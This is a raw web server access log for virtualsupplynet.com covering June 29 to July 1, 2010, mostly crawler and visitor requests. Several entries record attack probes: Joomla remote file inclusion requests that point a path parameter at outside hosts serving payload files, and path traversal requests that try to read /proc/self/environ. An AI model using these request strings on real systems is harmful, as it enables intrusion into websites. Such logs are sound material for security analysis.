95.108.150.235 - - [29/Jun/2010:18:32:46 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [29/Jun/2010:18:32:47 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [29/Jun/2010:18:32:47 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
77.88.31.246 - - [29/Jun/2010:19:32:44 -0700] "GET /logs/access_100501.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
38.99.98.88 - - [29/Jun/2010:19:33:11 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "virtualsupplynet.com"
38.99.98.88 - - [29/Jun/2010:19:33:13 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "virtualsupplynet.com"
38.99.98.88 - - [29/Jun/2010:19:33:14 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "virtualsupplynet.com"
77.88.31.246 - - [29/Jun/2010:22:27:48 -0700] "GET /logs/access_100403.log HTTP/1.1" 200 36253 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
208.80.193.121 - - [30/Jun/2010:00:12:56 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) BlackBerry8100/4.2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102" "www.virtualsupplynet.com"
67.195.115.249 - - [30/Jun/2010:01:08:35 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [30/Jun/2010:01:08:36 -0700] "GET /?D=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
77.88.31.246 - - [30/Jun/2010:01:21:11 -0700] "GET /logs/access.log HTTP/1.1" 200 51946 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
193.231.187.33 - - [30/Jun/2010:02:06:47 -0700] "GET /?option=com_multidisplay&Itemid=10&catid=&mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
193.231.187.33 - - [30/Jun/2010:02:06:47 -0700] "GET /logs//?option=com_multidisplay&Itemid=10&catid=&mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 200 3803 "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
67.195.110.174 - - [30/Jun/2010:02:41:27 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [30/Jun/2010:02:41:27 -0700] "GET /?N=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
77.88.31.246 - - [30/Jun/2010:04:13:52 -0700] "GET /logs/access_100227.log HTTP/1.1" 200 84763 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
194.42.16.25 - - [30/Jun/2010:04:38:30 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
194.42.16.25 - - [30/Jun/2010:04:38:30 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
74.53.98.130 - - [30/Jun/2010:05:28:35 -0700] "GET /logs/access_100515.log HTTP/1.1" 200 147627 "http://www.google.com.br/url?sa=t&source=web&cd=6&ved=0CC4QFjAF&url=http%3A%2F%2Fwww.virtualsupplynet.com%2Flogs%2Faccess_100515.log&rct=j&q=99.39.2.249&ei=ZjcrTJPQDoH-8Abrt9zSCA&usg=AFQjCNE8NKitRfUZcjWMWEfW3iEHBeJpjw" "Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4" "www.virtualsupplynet.com"
74.53.98.130 - - [30/Jun/2010:05:28:35 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4" "www.virtualsupplynet.com"
74.53.98.130 - - [30/Jun/2010:05:28:35 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4" "www.virtualsupplynet.com"
74.53.98.130 - - [30/Jun/2010:05:28:38 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4" "www.virtualsupplynet.com"
95.220.123.141 - - [30/Jun/2010:08:42:52 -0700] "GET /logs/access_100515.log HTTP/1.1" 200 147627 "-" "Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.2.1) Gecko/20021205" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:03:54 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:05:38 -0700] "GET /logs/ HTTP/1.1" 200 3798 "http://www.virtualsupplynet.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:05:39 -0700] "GET /tmp/ HTTP/1.1" 200 520 "http://www.virtualsupplynet.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:07:39 -0700] "GET /logs/access_100529.log HTTP/1.1" 200 87564 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:07:44 -0700] "GET /logs/access_100206.log HTTP/1.1" 200 93500 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:07:47 -0700] "GET /logs/access_100220.log HTTP/1.1" 200 78076 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:07:49 -0700] "GET /logs/access_100213.log HTTP/1.1" 200 76637 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:07:50 -0700] "GET /logs/access_100612.log HTTP/1.1" 200 104934 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:07:52 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:07:53 -0700] "GET /logs/access_100508.log HTTP/1.1" 200 116956 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:07:55 -0700] "GET /logs/access_100501.log HTTP/1.1" 200 73111 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:07:57 -0700] "GET /logs/access_100403.log HTTP/1.1" 200 36253 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:07:58 -0700] "GET /logs/access_100626.log HTTP/1.1" 200 104629 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:07:59 -0700] "GET /logs/access_100515.log HTTP/1.1" 200 147627 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:07:59 -0700] "GET /logs/access_100320.log HTTP/1.1" 200 138251 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:08:01 -0700] "GET /logs/access_100327.log HTTP/1.1" 200 146768 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:08:01 -0700] "GET /logs/access_100619.log HTTP/1.1" 200 114275 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:08:02 -0700] "GET /logs/access.log HTTP/1.1" 200 58296 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:08:02 -0700] "GET /logs/access_100410.log HTTP/1.1" 200 75311 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:08:02 -0700] "GET /logs/access_100605.log HTTP/1.1" 200 125664 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:08:03 -0700] "GET /logs/access_100417.log HTTP/1.1" 200 70879 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:08:04 -0700] "GET /logs/access_100313.log HTTP/1.1" 200 79502 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:08:04 -0700] "GET /logs/scripts.log HTTP/1.1" 200 1498 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:08:05 -0700] "GET /logs/access_100227.log HTTP/1.1" 200 84763 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:08:05 -0700] "GET /logs/access_100306.log HTTP/1.1" 200 82540 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.100.41.112 - - [30/Jun/2010:09:08:06 -0700] "GET /logs/access_100424.log HTTP/1.1" 200 61491 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
77.88.31.246 - - [30/Jun/2010:09:40:46 -0700] "GET /logs/access_091114.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
114.200.199.236 - - [30/Jun/2010:10:52:27 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://liturgiaetmusica.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
114.200.199.236 - - [30/Jun/2010:10:52:28 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://liturgiaetmusica.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
114.200.199.236 - - [30/Jun/2010:10:52:47 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://liturgiaetmusica.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
114.200.199.236 - - [30/Jun/2010:10:52:48 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://liturgiaetmusica.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
208.80.193.39 - - [30/Jun/2010:13:57:34 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.6-embedded; rev1.6; Windows NT 5.1)" "virtualsupplynet.com"
110.137.122.213 - - [30/Jun/2010:14:15:34 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5" "www.virtualsupplynet.com"
110.137.122.213 - - [30/Jun/2010:14:15:34 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5" "www.virtualsupplynet.com"
110.137.122.213 - - [30/Jun/2010:14:15:37 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5" "www.virtualsupplynet.com"
85.92.140.19 - - [30/Jun/2010:15:52:07 -0700] "GET /logs//index.php?optionhttp://pastebin.com/raw.php?i=0qvxtQf6 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
85.92.140.19 - - [30/Jun/2010:15:52:07 -0700] "GET /index.php?optionhttp://pastebin.com/raw.php?i=0qvxtQf6 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
88.250.57.232 - - [30/Jun/2010:16:32:37 -0700] "GET /logs/access_100629.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [30/Jun/2010:16:32:37 -0700] "GET /logs/access_100630.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
87.238.172.21 - - [30/Jun/2010:18:37:48 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
87.238.172.21 - - [30/Jun/2010:18:37:49 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
87.238.172.21 - - [30/Jun/2010:18:49:22 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
87.238.172.21 - - [30/Jun/2010:18:49:22 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
87.238.172.21 - - [30/Jun/2010:18:50:03 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
87.238.172.21 - - [30/Jun/2010:18:50:03 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
87.238.172.21 - - [30/Jun/2010:18:51:50 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
87.238.172.21 - - [30/Jun/2010:18:51:50 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
87.238.172.21 - - [30/Jun/2010:18:57:23 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
87.238.172.21 - - [30/Jun/2010:18:57:24 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
67.195.110.174 - - [30/Jun/2010:19:50:40 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [30/Jun/2010:19:50:42 -0700] "GET /logs/access_100529.log HTTP/1.0" 200 87564 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [30/Jun/2010:20:30:20 -0700] "GET /?S=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
77.88.31.246 - - [30/Jun/2010:20:52:13 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
208.115.111.249 - - [30/Jun/2010:21:57:13 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
192.228.230.3 - - [01/Jul/2010:00:34:45 -0700] "GET /logs/access.log HTTP/1.1" 200 66580 "-" "Mozilla/8.0" "www.virtualsupplynet.com"
67.195.110.174 - - [01/Jul/2010:01:23:38 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:01:34:40 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:01:34:40 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "virtualsupplynet.com"
77.88.31.246 - - [01/Jul/2010:01:59:47 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:02:18:06 -0700] "GET /logs/access_091010.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:02:18:10 -0700] "GET /logs/access_091017.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:02:18:14 -0700] "GET /logs/access_091024.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:02:18:19 -0700] "GET /logs/access_091031.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:02:18:25 -0700] "GET /logs/access_091107.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:02:18:30 -0700] "GET /logs/access_091114.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:02:18:35 -0700] "GET /logs/access_091121.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:02:18:40 -0700] "GET /logs/access_091128.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:02:18:45 -0700] "GET /logs/access_091205.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:05:20:31 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:06:01:55 -0700] "GET /?D=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:06:02:00 -0700] "GET /?M=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:06:02:04 -0700] "GET /?S=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:06:02:28 -0700] "GET /logs/?D=D HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:06:02:33 -0700] "GET /logs/?M=D HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:06:02:39 -0700] "GET /logs/?N=D HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:06:02:44 -0700] "GET /logs/?S=D HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:06:02:49 -0700] "GET /logs/access_091212.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:06:02:54 -0700] "GET /logs/access_091219.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:06:02:57 -0700] "GET /logs/access.log HTTP/1.1" 200 71569 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "virtualsupplynet.com"
77.88.31.246 - - [01/Jul/2010:07:32:26 -0700] "GET /logs/access_100626.log HTTP/1.1" 200 104629 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:09:09:17 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:09:47:24 -0700] "GET /logs/?D=A HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:09:47:28 -0700] "GET /logs/?M=A HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:09:47:33 -0700] "GET /logs/?S=A HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:09:47:38 -0700] "GET /logs/access_091226.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:09:47:43 -0700] "GET /logs/access_100102.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:09:47:48 -0700] "GET /logs/access_100109.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:09:47:53 -0700] "GET /logs/access_100116.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:09:48:13 -0700] "GET /logs/access_100123.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:09:48:16 -0700] "GET /logs/access_100130.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
67.195.110.174 - - [01/Jul/2010:09:49:29 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [01/Jul/2010:09:49:29 -0700] "GET /?D=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
208.80.193.29 - - [01/Jul/2010:10:06:20 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; SpamBlockerUtility 4.7.7; PeoplePal 3.0)" "www.virtualsupplynet.com"
77.88.31.246 - - [01/Jul/2010:11:33:24 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
